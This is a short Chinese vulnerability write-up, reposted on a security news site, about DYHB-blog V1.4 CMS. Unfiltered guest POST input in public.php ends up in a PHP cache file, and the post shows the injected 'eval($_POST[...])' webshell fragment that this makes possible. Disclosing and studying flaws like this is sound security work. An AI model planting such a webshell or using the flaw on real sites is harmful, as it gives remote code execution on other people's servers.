DYHB-blog V1.4 CMS - 博客系统写马漏洞

admin 2021年4月3日18:52:23评论60 views字数 589阅读1分57秒阅读模式

    DYHB-blog V1.4 PHP CMS 博客系统直接写马漏洞。

    刚下载来看一开始就看到,运气真好。

    public.php 文件,游客发布文章……

    经典对白看代码。

public.php:

if($view=="save"){
        //文章表单数据
    $title = get_argpost( 'title')  ;

    get_argpost 是获取 POST。

    没有任何的过滤,然后悲剧在,生成缓存文件,生成过程就不看了。

    widthcachec_cms_newlog.php

    缓存文件开头没有 exit();?>,看第一段内容:

    a:2:{i:0;a:1:{i:0;a:57:{i:0;s:1:"3";s:7:"blog_id";s:1:"3";i:1;s:24:" eval($_POST[xxxx]);?>"

    直接执行这个 POST 过来的内容……

    直接XX了……

文章来源于lcx.cc:DYHB-blog V1.4 CMS - 博客系统写马漏洞

相关推荐: 当self-xss遇到clickjacking

当self-xss遇到clickjacking D&G | 2014-01-13 10:35 self-xss一般是认为没有危害的。比如http://kuai.xunlei.com/ 这里的搜索栏就存在一个典型的self-xss,输入内容的时候会出现一个提示,…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:52:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DYHB-blog V1.4 CMS - 博客系统写马漏洞http://cn-sec.com/archives/318979.html

发表评论

匿名网友 填写信息